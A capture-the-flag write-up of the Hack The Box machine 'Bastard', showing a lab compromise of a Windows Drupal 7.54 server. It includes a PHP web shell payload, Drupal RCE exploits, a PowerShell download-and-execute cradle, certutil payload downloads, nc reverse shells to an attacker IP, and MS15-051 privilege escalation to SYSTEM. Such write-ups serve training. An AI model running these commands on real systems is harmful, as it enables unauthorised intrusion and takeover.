Bastard

Reconnaissance:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.9

80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard

135/tcp   open  msrpc   Microsoft Windows RPC

49154/tcp open  msrpc   Microsoft Windows RPC
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.9

All 1000 scanned ports on 10.10.10.9 are in ignored states.

We have three open ports.

  • Port 80: running Drupal 7

  • Port 135 & 49154: running Microsoft Windows RPC

I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7.

Enumeration: Drupal TCP 80

Visit the web application in the browser.

http://10.10.10.9/

It’s running Drupal which is is a free and open-source content management framework. Let’s look at the CHANGELOG to view the exact version.

http://10.10.10.9/CHANGELOG.txt
Drupal 7.54, 2017-02-01

Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in.

When it is an off-the-shelf software, I usually don’t run a brute force attack on it because it probably has a lock out policy in place.

Searchsploit:

Next, run searchsploit.

┌──(kali㉿kali)-[~]
└─$ searchsploit drupal 7

Let’s view vulnerability number 41564.

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 41564
  Exploit: Drupal 7.x Module Services - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41564
     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
    Codes: N/A
 Verified: True
File Type: C++ source, ASCII text
Copied to: /home/kali/41564.php

It links to this, It seems to be a deserialization vulnerability that leads to Remote Code Execution (RCE). Looking at the code, it we see that it visit the path /rest_endpoint to conduct the exploit.

$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';

That path is not found on the box, however, if we simply change it to /rest it works!

http://10.10.10.9/rest

So it is using the Services module. We’ll use this exploit to gain an initial foothold on the box.

Foothold:

Make the following changes to the exploit code.

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'shell.php',
    'data' => '<?php system($_REQUEST["cmd"]); ?>'
];

Run the exploit.

┌──(kali㉿kali)-[~/Desktop]
└─$ php 41564.php 
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce

#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/shell.php

Perfect! It created two files: session.json and user.json. View the content of user.json.

┌──(kali㉿kali)-[~/Desktop]
└─$ cat user.json 

"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"

I can identify that hash as Drupal 7, and try to break it:

hashcat -m 7900 $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE /usr/share/wordlists/rockyou.txt --force

However, that was going to take about three days on my system, and I don’t really need the password at this point.

It gives us the hashed password of the admin user. We could run it through a password cracker, however, we don’t need to because the session.json file gives us a valid session cookie for the admin user.

┌──(kali㉿kali)-[~/Desktop]
└─$ cat session.json
{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "FVOXx3tasjzJLhRuUq_k33sXCbkWyfx7-9TuHjMEWI0",
    "token": "3eJjQU7S1jUPgVIwYOeyR26UvQntmh9XPXN_B13VB4U"
}      
http://10.10.10.9/shell.php?cmd=dir

Exploit: Ruby Script

On reading about Drupalgeddon2, it seems this is testing the vulnerability on a Drupal 8 specific path.

I’ll try the ruby script, searchsploit -m exploits/php/webapps/44449.rb. Now I’ll run it, and it returns the help, and a warning:

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m exploits/php/webapps/44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
    Codes: CVE-2018-7600
 Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/kali/Desktop/44449.rb

┌──(kali㉿kali)-[~/Desktop]
└─$ ruby 44449.rb 
Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
       ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
       ruby drupalgeddon2.rb https://example.com --authentication

I’ll fix the warning about \r with dos2unix:

┌──(kali㉿kali)-[~/Desktop]
└─$ dos2unix 44449.rb
dos2unix: converting file 44449.rb to Unix format...

┌──(kali㉿kali)-[~/Desktop]
└─$ ruby 44449.rb http://10.10.10.9/

drupalgeddon2>> whoami
nt authority\iusr

drupalgeddon2>> cd \dimitris
drupalgeddon2>> dir

Shell: Nishang

I can upgrade this to a Nishang shell by grabbing a copy of Invoke-PowerShellTcp.ps1, adding a call to the function to the end, Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443, and then serving that directory with python3 -m http.server 80. I’ll also open a nc listener on port 443.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443

Then I give this command to the Drupalgeddon2 shell:

drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/shell.ps1')

My python webserver gets the request for shell.ps1 and sends it When shell.ps1 is run, it loads all the functions, and then invokes the reverse shell to me on port 443, which I get in nc:

PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr

Privesc : MS15-051

We use the command “whoami /priv” to check the privileges with our user and see that we have permissions to the privilege “SeImpersonatePrivilege“. We already know this one from other machines that we have solved, we know that we can impersonate the user “nt authority\system“.

PS C:\inetpub\drupal-7.54> whoami /priv
PS C:\inetpub\drupal-7.54> systeminfo

As we can see, we are in a Windows Server 2008 R2, of which there are several kernel-level exploits that we could also use.

I’ll grab it from here:

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80

PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/nc64.exe
PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/ms15-051x64.exe
PS C:\inetpub\drupal-7.54> dir
PS C:\inetpub\drupal-7.54> .\nc64.exe -e cmd.exe 10.10.14.2 443

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443
C:\inetpub\drupal-7.54>.\ms15-051x64.exe "whoami"
.\ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2532 created.
==============================
nt authority\system

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

C:\inetpub\drupal-7.54>.\ms15-051x64.exe ".\nc64.exe -e cmd.exe 10.10.14.2 443"
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt

PreviousOptimumNextGranny

Last updated